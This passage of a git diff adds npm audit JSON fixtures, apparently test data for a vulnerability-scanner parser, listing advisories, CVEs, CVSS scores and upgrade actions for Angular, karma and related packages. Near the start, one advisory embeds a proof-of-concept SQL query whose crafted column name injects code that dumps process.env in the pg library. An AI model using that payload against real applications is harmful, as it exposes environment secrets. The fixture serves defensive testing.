|| >= 6.2.0 < 6.2.5 || >= 6.3.0 < 6.3.3 || >= 6.4.0 < 6.4.2 || >= 7.0.0 < 7.0.2 || >= 7.1.0 < 7.1.2", + "patched_versions": ">= 2.11.2 < 3.0.0|| >= 3.6.4 < 4.0.0 || >= 4.5.7 < 5.0.0 || >= 5.2.1 < 6.0.0 || >= 6.0.5 < 6.1.0 || >= 6.1.6 < 6.2.0 || >= 6.2.5 < 6.3.0 || >= 6.3.3 < 6.4.0 || >= 6.4.2 < 7.0.0 || >= 7.0.2 < 7.1.0 || >= 7.1.2", + "overview": "Affected versions of `pg` contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name. \n\nThere are two specific scenarios in which it is likely for an application to be vulnerable:\n1. The application executes unsafe, user-supplied sql which contains malicious column names.\n2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.\n\n## Proof of Concept\n```\nconst { Client } = require('pg')\nconst client = new Client()\nclient.connect()\n\nconst sql = `SELECT 1 AS \"\\\\'/*\", 2 AS \"\\\\'*/\\n + console.log(process.env)] = null;\\n//\"`\n\nclient.query(sql, (err, res) => {\n client.end()\n})\n```", + "recommendation": "* Version 2.x.x: Update to version 2.11.2 or later.\n* Version 3.x.x: Update to version 3.6.4 or later.\n* Version 4.x.x: Update to version 4.5.7 or later.\n* Version 5.x.x: Update to version 5.2.1 or later.\n* Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )\n* Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )", + "references": "[Node Postgres: Code Execution Vulnerability Announcement](https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)", + "access": "public", + "severity": "high", + "cwe": "CWE-94", + "metadata": { + "module_type": "Network.Library", + "exploitability": 5, + "affected_components": "" + }, + "url": "https://nodesecurity.io/advisories/522" + } + }, + "muted": [], + "metadata": { + "vulnerabilities": { + "info": 0, + "low": 7, + "moderate": 2, + "high": 6, + "critical": 0 + }, + "dependencies": 159, + "devDependencies": 0, + "optionalDependencies": 0, + "totalDependencies": 159 + }, + "runId": "849ed1f1-5dd8-4fda-872a-05cd46957c82" +} \ No newline at end of file diff --git a/unittests/scans/npm_audit_sample/multiple_cwes.json b/unittests/scans/npm_audit_sample/multiple_cwes.json new file mode 100644 index 00000000000..d1e05975137 --- /dev/null +++ b/unittests/scans/npm_audit_sample/multiple_cwes.json @@ -0,0 +1,2221 @@ +{ + "actions": [ + { + "isMajor": true, + "action": "install", + "resolves": [ + { + "id": 1059337, + "path": "@angular-devkit/build-angular>webpack-dev-server>ansi-html", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059356, + "path": "@angular-devkit/build-angular>postcss", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059413, + "path": "@angular-devkit/build-angular>webpack-dev-server>selfsigned>node-forge", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059432, + "path": "@angular-devkit/build-angular>webpack-dev-server>selfsigned>node-forge", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059434, + "path": "@angular-devkit/build-angular>webpack-dev-server>selfsigned>node-forge", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059599, + "path": "@angular-devkit/build-angular>webpack-dev-server>yargs>cliui>string-width>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059599, + "path": "@angular-devkit/build-angular>webpack-dev-server>yargs>cliui>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059698, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059701, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059704, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059733, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059737, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059799, + "path": "@angular-devkit/build-angular>postcss", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059828, + "path": "@angular-devkit/build-angular>copy-webpack-plugin>glob-parent", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059828, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>glob-parent", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059828, + "path": "@angular-devkit/build-angular>webpack>watchpack>watchpack-chokidar2>chokidar>glob-parent", + "dev": true, + "optional": true, + "bundled": false + }, + { + "id": 1059870, + "path": "@angular-devkit/build-angular>browserslist", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059915, + "path": "@angular-devkit/build-angular>ajv", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059915, + "path": "@angular-devkit/build-angular>@angular-devkit/core>ajv", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059915, + "path": "@angular-devkit/build-angular>@angular-devkit/architect>@angular-devkit/core>ajv", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059915, + "path": "@angular-devkit/build-angular>@angular-devkit/build-webpack>@angular-devkit/architect>@angular-devkit/core>ajv", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059915, + "path": "@angular-devkit/build-angular>istanbul-instrumenter-loader>schema-utils>ajv", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1060025, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1060267, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>rc>ini", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1060279, + "path": "@angular-devkit/build-angular>webpack-dev-server>yargs>yargs-parser", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1060396, + "path": "@angular-devkit/build-angular>tree-kill", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1060396, + "path": "@angular-devkit/build-angular>@ngtools/webpack>tree-kill", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1061294, + "path": "@angular-devkit/build-angular>copy-webpack-plugin>serialize-javascript", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1061404, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>rc>minimist", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1061405, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>mkdirp>minimist", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1061405, + "path": "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar>mkdirp>minimist", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1061457, + "path": "@angular-devkit/build-angular>copy-webpack-plugin>serialize-javascript", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "@angular-devkit/build-angular", + "target": "13.2.6" + }, + { + "isMajor": true, + "action": "install", + "resolves": [ + { + "id": 1059382, + "path": "karma", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059406, + "path": "karma>log4js", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059778, + "path": "karma>socket.io>socket.io-parser", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059778, + "path": "karma>socket.io>socket.io-client>socket.io-parser", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059871, + "path": "karma>socket.io>socket.io-client>engine.io-client>xmlhttprequest-ssl", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059976, + "path": "karma>socket.io>socket.io-client>engine.io-client>xmlhttprequest-ssl", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1060087, + "path": "karma>socket.io>engine.io", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1060234, + "path": "karma>socket.io", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1061405, + "path": "karma>optimist>minimist", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1061952, + "path": "karma", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "karma", + "target": "6.3.17" + }, + { + "isMajor": true, + "action": "install", + "resolves": [ + { + "id": 1059599, + "path": "@angular/cli>inquirer>string-width>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059599, + "path": "@angular/cli>inquirer>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1060267, + "path": "@angular/cli>ini", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1060267, + "path": "@angular/cli>@schematics/update>ini", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1061322, + "path": "@angular/cli>pacote>npm-registry-fetch", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1061322, + "path": "@angular/cli>@schematics/update>pacote>npm-registry-fetch", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "@angular/cli", + "target": "13.2.6" + }, + { + "isMajor": true, + "action": "install", + "resolves": [ + { + "id": 1059599, + "path": "@angular/compiler-cli>yargs>cliui>string-width>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059599, + "path": "@angular/compiler-cli>yargs>cliui>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059599, + "path": "@angular/compiler-cli>yargs>string-width>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059698, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059701, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059704, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059733, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1059737, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1060267, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>rc>ini", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1061404, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>rc>minimist", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1061405, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>mkdirp>minimist", + "dev": true, + "optional": true, + "bundled": true + }, + { + "id": 1061405, + "path": "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar>mkdirp>minimist", + "dev": true, + "optional": true, + "bundled": true + } + ], + "module": "@angular/compiler-cli", + "target": "13.2.6" + }, + { + "action": "update", + "resolves": [ + { + "id": 1059351, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>url-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059351, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>eventsource>original>url-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059355, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>url-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059355, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>eventsource>original>url-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059360, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>url-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059360, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>eventsource>original>url-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059365, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>url-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059365, + "path": "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>eventsource>original>url-parse", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "url-parse", + "target": "1.5.10", + "depth": 6 + }, + { + "action": "update", + "resolves": [ + { + "id": 1059367, + "path": "karma>http-proxy>follow-redirects", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059367, + "path": "@angular-devkit/build-angular>webpack-dev-server>http-proxy-middleware>http-proxy>follow-redirects", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059420, + "path": "karma>http-proxy>follow-redirects", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059420, + "path": "@angular-devkit/build-angular>webpack-dev-server>http-proxy-middleware>http-proxy>follow-redirects", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "follow-redirects", + "target": "1.14.9", + "depth": 5 + }, + { + "action": "update", + "resolves": [ + { + "id": 1059404, + "path": "@angular/compiler-cli>shelljs", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1059412, + "path": "@angular/compiler-cli>shelljs", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "shelljs", + "target": "0.8.5", + "depth": 2 + }, + { + "action": "update", + "resolves": [ + { + "id": 1059486, + "path": "@angular-devkit/build-angular>less>request>http-signature>jsprim>json-schema", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "jsprim", + "target": "1.4.2", + "depth": 5 + } + ], + "advisories": { + "1059337": { + "findings": [ + { + "version": "0.0.7", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>ansi-html" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<0.0.8", + "module_name": "ansi-html", + "severity": "high", + "github_advisory_id": "GHSA-whgm-jr23-g3j9", + "cves": [ + "CVE-2021-23424" + ], + "access": "public", + "patched_versions": ">=0.0.8", + "cvss": { + "score": 7.5, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + "updated": "2022-03-08T22:23:35.000Z", + "recommendation": "Upgrade to version 0.0.8 or later", + "cwe": "[\"CWE-400\"]", + "found_by": null, + "deleted": null, + "id": 1059337, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-23424\n- https://github.com/Tjatse/ansi-html/issues/19\n- https://snyk.io/vuln/SNYK-JS-ANSIHTML-1296849\n- https://github.com/ioet/time-tracker-ui/security/advisories/GHSA-4fjc-8q3h-8r69\n- https://github.com/Tjatse/ansi-html/commit/8142b25bca3133ea060bcc1889277dc482327a63\n- https://github.com/advisories/GHSA-whgm-jr23-g3j9", + "created": "2022-03-09T20:00:43.984Z", + "reported_by": null, + "title": "Uncontrolled Resource Consumption in ansi-html", + "npm_advisory_id": null, + "overview": "This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.", + "url": "https://github.com/advisories/GHSA-whgm-jr23-g3j9" + }, + "1059351": { + "findings": [ + { + "version": "1.5.3", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>url-parse", + "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>eventsource>original>url-parse" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.5.9", + "module_name": "url-parse", + "severity": "moderate", + "github_advisory_id": "GHSA-jf5r-8hm2-f872", + "cves": [ + "CVE-2022-0691" + ], + "access": "public", + "patched_versions": ">=1.5.9", + "cvss": { + "score": 6.5, + "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + }, + "updated": "2022-03-01T19:05:21.000Z", + "recommendation": "Upgrade to version 1.5.9 or later", + "cwe": "[\"CWE-639\"]", + "found_by": null, + "deleted": null, + "id": 1059351, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0691\n- https://github.com/unshiftio/url-parse/commit/0e3fb542d60ddbf6933f22eb9b1e06e25eaa5b63\n- https://huntr.dev/bounties/57124ed5-4b68-4934-8325-2c546257f2e4\n- https://github.com/advisories/GHSA-jf5r-8hm2-f872", + "created": "2022-03-09T20:00:43.986Z", + "reported_by": null, + "title": "Authorization Bypass Through User-Controlled Key in url-parse", + "npm_advisory_id": null, + "overview": "url-parse prior to 1.5.9 is vulnerable to authorization bypass by adding a backspace character to the input.", + "url": "https://github.com/advisories/GHSA-jf5r-8hm2-f872" + }, + "1059355": { + "findings": [ + { + "version": "1.5.3", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>url-parse", + "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>eventsource>original>url-parse" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.5.8", + "module_name": "url-parse", + "severity": "critical", + "github_advisory_id": "GHSA-hgjh-723h-mx2j", + "cves": [ + "CVE-2022-0686" + ], + "access": "public", + "patched_versions": ">=1.5.8", + "cvss": { + "score": 9.1, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + }, + "updated": "2022-02-23T21:26:49.000Z", + "recommendation": "Upgrade to version 1.5.8 or later", + "cwe": "[\"CWE-639\"]", + "found_by": null, + "deleted": null, + "id": 1059355, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0686\n- https://github.com/unshiftio/url-parse/commit/d5c64791ef496ca5459ae7f2176a31ea53b127e5\n- https://huntr.dev/bounties/55fd06cd-9054-4d80-83be-eb5a454be78c\n- https://github.com/advisories/GHSA-hgjh-723h-mx2j", + "created": "2022-03-09T20:00:43.986Z", + "reported_by": null, + "title": "Authorization Bypass Through User-Controlled Key in url-parse", + "npm_advisory_id": null, + "overview": "url-parse prior to version 1.5.8 is vulnerable to Authorization Bypass Through User-Controlled Key.", + "url": "https://github.com/advisories/GHSA-hgjh-723h-mx2j" + }, + "1059356": { + "findings": [ + { + "version": "7.0.17", + "paths": [ + "@angular-devkit/build-angular>postcss" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<7.0.36", + "module_name": "postcss", + "severity": "moderate", + "github_advisory_id": "GHSA-566m-qj78-rww5", + "cves": [ + "CVE-2021-23382" + ], + "access": "public", + "patched_versions": ">=7.0.36", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + "updated": "2022-02-23T20:31:16.000Z", + "recommendation": "Upgrade to version 7.0.36 or later", + "cwe": "[\"CWE-400\"]", + "found_by": null, + "deleted": null, + "id": 1059356, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-23382\n- https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641\n- https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640\n- https://github.com/postcss/postcss/releases/tag/7.0.36\n- https://github.com/advisories/GHSA-566m-qj78-rww5", + "created": "2022-03-09T20:00:43.987Z", + "reported_by": null, + "title": "Regular Expression Denial of Service in postcss", + "npm_advisory_id": null, + "overview": "The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \\/\\*\\s* sourceMappingURL=(.*).", + "url": "https://github.com/advisories/GHSA-566m-qj78-rww5" + }, + "1059360": { + "findings": [ + { + "version": "1.5.3", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>url-parse", + "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>eventsource>original>url-parse" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.5.7", + "module_name": "url-parse", + "severity": "moderate", + "github_advisory_id": "GHSA-8v38-pw62-9cw2", + "cves": [ + "CVE-2022-0639" + ], + "access": "public", + "patched_versions": ">=1.5.7", + "cvss": { + "score": 6.5, + "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + }, + "updated": "2022-02-22T18:08:06.000Z", + "recommendation": "Upgrade to version 1.5.7 or later", + "cwe": "[\"CWE-639\"]", + "found_by": null, + "deleted": null, + "id": 1059360, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0639\n- https://github.com/unshiftio/url-parse/commit/ef45a1355375a8244063793a19059b4f62fc8788\n- https://huntr.dev/bounties/83a6bc9a-b542-4a38-82cd-d995a1481155\n- https://github.com/advisories/GHSA-8v38-pw62-9cw2", + "created": "2022-03-09T20:00:43.987Z", + "reported_by": null, + "title": "Authorization Bypass Through User-Controlled Key in url-parse", + "npm_advisory_id": null, + "overview": "url-parse prior to version 1.5.7 is vulnerable to Authorization Bypass Through User-Controlled Key. Url-parse is not able to verify broken protocol. This will allow to bypass hostname validation.", + "url": "https://github.com/advisories/GHSA-8v38-pw62-9cw2" + }, + "1059365": { + "findings": [ + { + "version": "1.5.3", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>url-parse", + "@angular-devkit/build-angular>webpack-dev-server>sockjs-client>eventsource>original>url-parse" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.5.6", + "module_name": "url-parse", + "severity": "moderate", + "github_advisory_id": "GHSA-rqff-837h-mm52", + "cves": [ + "CVE-2022-0512" + ], + "access": "public", + "patched_versions": ">=1.5.6", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + "updated": "2022-02-16T22:37:40.000Z", + "recommendation": "Upgrade to version 1.5.6 or later", + "cwe": "[\"CWE-639\"]", + "found_by": null, + "deleted": null, + "id": 1059365, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0512\n- https://github.com/unshiftio/url-parse/commit/9be7ee88afd2bb04e4d5a1a8da9a389ac13f8c40\n- https://huntr.dev/bounties/6d1bc51f-1876-4f5b-a2c2-734e09e8e05b\n- https://github.com/advisories/GHSA-rqff-837h-mm52", + "created": "2022-03-09T20:00:43.988Z", + "reported_by": null, + "title": "Authorization bypass in url-parse", + "npm_advisory_id": null, + "overview": "Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.6.", + "url": "https://github.com/advisories/GHSA-rqff-837h-mm52" + }, + "1059367": { + "findings": [ + { + "version": "1.7.0", + "paths": [ + "karma>http-proxy>follow-redirects", + "@angular-devkit/build-angular>webpack-dev-server>http-proxy-middleware>http-proxy>follow-redirects" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.14.8", + "module_name": "follow-redirects", + "severity": "moderate", + "github_advisory_id": "GHSA-pw2r-vq6v-hr8c", + "cves": [ + "CVE-2022-0536" + ], + "access": "public", + "patched_versions": ">=1.14.8", + "cvss": { + "score": 5.9, + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "updated": "2022-02-11T21:18:03.000Z", + "recommendation": "Upgrade to version 1.14.8 or later", + "cwe": "[\"CWE-200\"]", + "found_by": null, + "deleted": null, + "id": 1059367, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0536\n- https://github.com/follow-redirects/follow-redirects/commit/62e546a99c07c3ee5e4e0718c84a6ca127c5c445\n- https://huntr.dev/bounties/7cf2bf90-52da-4d59-8028-a73b132de0db\n- https://github.com/advisories/GHSA-pw2r-vq6v-hr8c", + "created": "2022-03-09T20:00:43.988Z", + "reported_by": null, + "title": "Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects", + "npm_advisory_id": null, + "overview": "Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.", + "url": "https://github.com/advisories/GHSA-pw2r-vq6v-hr8c" + }, + "1059382": { + "findings": [ + { + "version": "4.2.0", + "paths": [ + "karma" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<6.3.14", + "module_name": "karma", + "severity": "moderate", + "github_advisory_id": "GHSA-7x7c-qm48-pq9c", + "cves": [ + "CVE-2022-0437" + ], + "access": "public", + "patched_versions": ">=6.3.14", + "cvss": { + "score": 6.1, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + "updated": "2022-02-07T21:57:21.000Z", + "recommendation": "Upgrade to version 6.3.14 or later", + "cwe": "[\"CWE-79\"]", + "found_by": null, + "deleted": null, + "id": 1059382, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0437\n- https://github.com/karma-runner/karma/commit/839578c45a8ac42fbc1d72105f97eab77dd3eb8a\n- https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885\n- https://github.com/karma-runner/karma/releases/tag/v6.3.14\n- https://github.com/advisories/GHSA-7x7c-qm48-pq9c", + "created": "2022-03-09T20:00:43.990Z", + "reported_by": null, + "title": "Cross-site Scripting in karma", + "npm_advisory_id": null, + "overview": "karma prior to version 6.3.14 contains a cross-site scripting vulnerability.", + "url": "https://github.com/advisories/GHSA-7x7c-qm48-pq9c" + }, + "1059404": { + "findings": [ + { + "version": "0.8.3", + "paths": [ + "@angular/compiler-cli>shelljs" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<0.8.5", + "module_name": "shelljs", + "severity": "high", + "github_advisory_id": "GHSA-4rq4-32rv-6wp6", + "cves": [ + "CVE-2022-0144" + ], + "access": "public", + "patched_versions": ">=0.8.5", + "cvss": { + "score": 7.1, + "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H" + }, + "updated": "2022-01-21T21:05:53.000Z", + "recommendation": "Upgrade to version 0.8.5 or later", + "cwe": "[\"CWE-269\"]", + "found_by": null, + "deleted": null, + "id": 1059404, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-0144\n- https://github.com/shelljs/shelljs/commit/d919d22dd6de385edaa9d90313075a77f74b338c\n- https://huntr.dev/bounties/50996581-c08e-4eed-a90e-c0bac082679c\n- https://github.com/advisories/GHSA-4rq4-32rv-6wp6", + "created": "2022-03-09T20:00:43.993Z", + "reported_by": null, + "title": "Improper Privilege Management in shelljs", + "npm_advisory_id": null, + "overview": "shelljs is vulnerable to Improper Privilege Management", + "url": "https://github.com/advisories/GHSA-4rq4-32rv-6wp6" + }, + "1059406": { + "findings": [ + { + "version": "4.5.1", + "paths": [ + "karma>log4js" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<6.4.0", + "module_name": "log4js", + "severity": "moderate", + "github_advisory_id": "GHSA-82v2-mx6x-wq7q", + "cves": [ + "CVE-2022-21704" + ], + "access": "public", + "patched_versions": ">=6.4.0", + "cvss": { + "score": 5.5, + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + "updated": "2022-01-19T22:47:15.000Z", + "recommendation": "Upgrade to version 6.4.0 or later", + "cwe": "[\"CWE-276\"]", + "found_by": null, + "deleted": null, + "id": 1059406, + "references": "- https://github.com/log4js-node/log4js-node/security/advisories/GHSA-82v2-mx6x-wq7q\n- https://github.com/log4js-node/log4js-node/pull/1141/commits/8042252861a1b65adb66931fdf702ead34fa9b76\n- https://github.com/log4js-node/streamroller/pull/87\n- https://github.com/log4js-node/log4js-node/blob/v6.4.0/CHANGELOG.md#640\n- https://nvd.nist.gov/vuln/detail/CVE-2022-21704\n- https://github.com/advisories/GHSA-82v2-mx6x-wq7q", + "created": "2022-03-09T20:00:43.993Z", + "reported_by": null, + "title": "Incorrect Default Permissions in log4js", + "npm_advisory_id": null, + "overview": "### Impact\r\nDefault file permissions for log files created by the file, fileSync and dateFile appenders are world-readable (in unix). This could cause problems if log files contain sensitive information. This would affect any users that have not supplied their own permissions for the files via the mode parameter in the config.\r\n\r\n### Patches\r\nFixed by:\r\n* https://github.com/log4js-node/log4js-node/pull/1141\r\n* https://github.com/log4js-node/streamroller/pull/87\r\n\r\nReleased to NPM in log4js@6.4.0\r\n\r\n### Workarounds\r\nEvery version of log4js published allows passing the mode parameter to the configuration of file appenders, see the documentation for details.\r\n\r\n### References\r\n\r\nThanks to [ranjit-git](https://www.huntr.dev/users/ranjit-git) for raising the issue, and to @peteriman for fixing the problem.\r\n\r\n### For more information\r\nIf you have any questions or comments about this advisory:\r\n* Open an issue in [logj4s-node](https://github.com/log4js-node/log4js-node)\r\n* Ask a question in the [slack channel](https://join.slack.com/t/log4js-node/shared_invite/enQtODkzMDQ3MzExMDczLWUzZmY0MmI0YWI1ZjFhODY0YjI0YmU1N2U5ZTRkOTYyYzg3MjY5NWI4M2FjZThjYjdiOGM0NjU2NzBmYTJjOGI)\r\n* Email us at [gareth.nomiddlename@gmail.com](mailto:gareth.nomiddlename@gmail.com)\r\n", + "url": "https://github.com/advisories/GHSA-82v2-mx6x-wq7q" + }, + "1059412": { + "findings": [ + { + "version": "0.8.3", + "paths": [ + "@angular/compiler-cli>shelljs" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<0.8.5", + "module_name": "shelljs", + "severity": "moderate", + "github_advisory_id": "GHSA-64g7-mvw6-v9qj", + "cves": [], + "access": "public", + "patched_versions": ">=0.8.5", + "cvss": { + "score": 0, + "vectorString": null + }, + "updated": "2022-01-14T20:50:59.000Z", + "recommendation": "Upgrade to version 0.8.5 or later", + "cwe": 